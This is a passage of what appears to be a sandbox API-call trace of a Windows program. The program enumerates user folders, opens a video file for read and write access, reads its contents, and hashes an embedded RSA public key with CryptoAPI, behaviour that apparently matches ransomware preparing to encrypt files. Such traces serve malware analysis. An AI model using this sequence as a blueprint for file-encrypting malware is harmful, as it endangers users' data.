[0191.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.687] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\SendTo\\") returned="SendTo\\" [0191.687] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0191.687] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0191.687] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0191.687] PathFindFileNameW (pszPath="") returned="" [0191.688] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\SendTo\\*" (normalized: "c:\\users\\keecfmwgj\\sendto\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0191.688] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0191.688] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0191.688] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Start Menu\\") returned="Start Menu\\" [0191.688] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0191.690] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0191.690] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0191.690] PathFindFileNameW (pszPath="") returned="" [0191.690] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Start Menu\\*" (normalized: "c:\\users\\keecfmwgj\\start menu\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0191.691] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0191.691] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0191.691] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Templates\\") returned="Templates\\" [0191.691] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0191.691] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0191.691] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0191.691] PathFindFileNameW (pszPath="") returned="" [0191.691] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Templates\\*" (normalized: "c:\\users\\keecfmwgj\\templates\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0191.691] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0191.691] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0191.692] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0191.692] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0191.692] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0191.692] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0191.692] PathFindFileNameW (pszPath="") returned="" [0191.692] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9ac462f0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9ac462f0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0191.692] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9ac462f0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9ac462f0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0191.692] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54142320, ftCreationTime.dwHighDateTime=0x1d8986e, ftLastAccessTime.dwLowDateTime=0x5a499430, ftLastAccessTime.dwHighDateTime=0x1d89e0b, ftLastWriteTime.dwLowDateTime=0x5a499430, ftLastWriteTime.dwHighDateTime=0x1d89e0b, nFileSizeHigh=0x0, nFileSizeLow=0x15f1b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="07H2voZRMEM4mGd_N.swf", cAlternateFileName="07H2VO~1.SWF")) returned 1 [0191.692] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\07H2voZRMEM4mGd_N.swf") returned=".swf" [0191.692] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\07H2voZRMEM4mGd_N.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\07h2vozrmem4mgd_n.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.693] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=89883) returned 1 [0191.693] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0191.697] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15ef5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.697] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0191.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.699] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.699] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x15f1b, lpOverlapped=0x0) returned 1 [0191.700] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0191.700] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.700] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.700] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0191.702] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0191.702] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.702] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0191.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0191.702] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0191.702] GetLastError () returned 0x0 [0191.702] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0191.702] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0191.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.702] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0191.702] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0191.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.702] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0191.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x15f20) returned 0x2af5168 [0191.703] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0191.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0191.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0191.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6050 [0191.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3930 [0191.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6068 [0191.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6098 [0191.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60f8 [0191.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60b0 [0191.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0191.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0191.704] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0191.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0191.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0191.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0191.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0191.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60f8 [0191.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0191.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60b0 [0191.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0191.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6098 [0191.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0191.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0191.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0191.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0191.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0191.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0191.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0191.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0191.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0191.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0191.707] GetCurrentThreadId () returned 0x5d8 [0191.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0191.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5c88 [0191.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0191.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0191.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0191.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0191.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.708] GetCurrentThreadId () returned 0x5d8 [0191.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0191.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0191.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0191.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0191.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60f8 [0191.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0191.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0191.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0191.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6098 [0191.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0191.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0191.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0191.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0191.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60b0 [0191.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0191.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0191.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0191.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6080 [0191.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0191.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6110 [0191.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0191.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60e0 [0191.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60c8 [0191.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6128 [0191.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0191.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60c8 [0191.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0191.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0191.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0191.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0191.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6098 [0191.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.712] RtlAllocateHeap (HeapHandle=0x2c0000, 